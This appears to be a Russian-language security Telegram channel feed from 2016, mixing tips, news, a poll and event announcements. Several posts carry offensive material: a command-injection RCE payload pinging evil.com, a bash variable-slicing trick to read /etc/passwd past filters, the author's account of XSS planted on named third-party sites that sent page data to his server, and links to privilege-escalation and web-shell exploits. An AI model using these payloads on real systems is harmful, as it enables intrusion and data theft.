Блогер Wylsacom (https://www.youtube.com/channel/UCt7sv-NKh44rHAEb-qCCxvA) случайно показал логин и пароль к сервису в приямой трансляции

Понравилось:
1. Не верьте никому и ничему.
2. Всегда предполагайте худший сценарий.
3. Применяйте многоуровневую защиту (Defence-in-Depth).
4. Придерживайтесь принципа «чем проще, тем лучше» (Keep It Simple Stupid, KISS).
5. Придерживайтесь принципа «минимальных привилегий».
6. Злоумышленники чуют неясность.
7. Читайте документацию (RTFM), но никогда ей не доверяйте.
8. Если это не тестировали, то это не работает.
9. Это всегда ваша ошибка!

В telegram появились интеграция с играми (через @gamee).

¯\_(ツ)_/¯

А может тут полноценный бложек завести?
anonymous poll

Давай! Флуди, пиши мнения, мне норм – 197
👍👍👍👍👍👍👍 75%

Лучше коротко и по существу – 64
👍👍 25%

👥 261 people voted so far.

Держи RCE вектор:

&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&'\"`0&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&`'

При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда ping -c evil.com. На случай экранирования пробелов можно использовать ${IFS} - это пустая строка.

Забавный эксплойт для повышения привлегий до суперпользователя в Tomcat (на Debian).
https://vulners.com/exploitdb/EDB-ID:40450

OWASP Russia Meetup в Яндексе, в следующую среду.

Доклады:
[*] Web application firewalls: анализ логики обнаружения атак
[*] Безопасность TLS в роще доменов
[*] Software development lifecycle: финальный аудит безопасности и его автоматизация

https://events.yandex.ru/events/yagosti/12-oct-2016/

Не умеют парсить.
Сунул я как-то XSS вектор в статус instagram, без повода и цели - смотрю, а XSS срабатывает. Начал отправлять себе на сервер содержимое окна, текущий урл, получился такой вот сниффер. Так вот, XSS сработали на:

- findgram.me
- imgrab.com
- instagy.com
- iconosquare.com
- tofo.me
- photo.sh
- gramosphere.com

Что за сервисы я не сильно представляю, но с фильтрацией пользовательских данных у них не очень.

За большинством кибератак стоят дети и мошенники, а не государство
https://goo.gl/Wyr8JG

И ещё о bash.

Из переменных (и не только) можно склеивать команды, тем самым можно обойти системы обнаружения и фильты (ну мало ли).

Например, переменная COMP_WORDBREAKS — набор символов рассматриваемые как разделители слов.

echo $COMP_WORDBREAKS
вернет
"'><=;|&(:

Обращаясь к переменным, в таком представлении, можно вернуть один или несколько символов (первое после двоеточия число - начальное значение символа, вторая цифра - количество символов)

echo ${COMP_WORDBREAKS:11:2}
вернет (:

Подобным образом можно собрать полноценную команду, склеивая кусочки переменных
cat${COMP_WORDBREAKS:0:1}${PATH:0:1}etc${HOME:0:1}passwd
что будет интерпретировано как cat /etc/passwd

Ну или даже так:
${SHELLOPTS:3:1}at ${PATH:0:1}${SHELLOPTS:4:1}t${SHELLOPTS:3:1}${HOME:0:1}p${SHELLOPTS:2:1}sswd

Кстати, тот самый доклад Владимира Иванова, о котором я говорю в описании своего доклада :)

https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf

Версия на русском:
https://youtu.be/50Sv1_nsjnE?t=9m37s

¯ \ _ (ツ) _ / ¯

Вышел новый ядерный эксплойт повышения привелегий до суперпользователя в linux, в том числе под свежие ядра, использует race condition, а именуется грязной скотиной

https://dirtycow.ninja

Сегодня часть интернета не работает. Не удивляйтесь, если твиттер или гитхаб не откроется.

http://thehackernews.com/2016/10/dyn-dns-ddos.html

А если ты очень хочешь на ZeroNights, но внутренний еврей не позволяет тебе заплатить - го в волонтёры!

https://2016.zeronights.ru/news/zeronights-priglashaet-volonterov/

А ещё билет можно выиграть в hackquest'е

https://2016.zeronights.ru/news/vnimanie-skoro-zapuskaem-hackquest/

Слышали про CVE-2016-8869 и CVE-2016-8870 в joomla?
А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл.

https://github.com/XiphosResearch/exploits/tree/master/Joomraa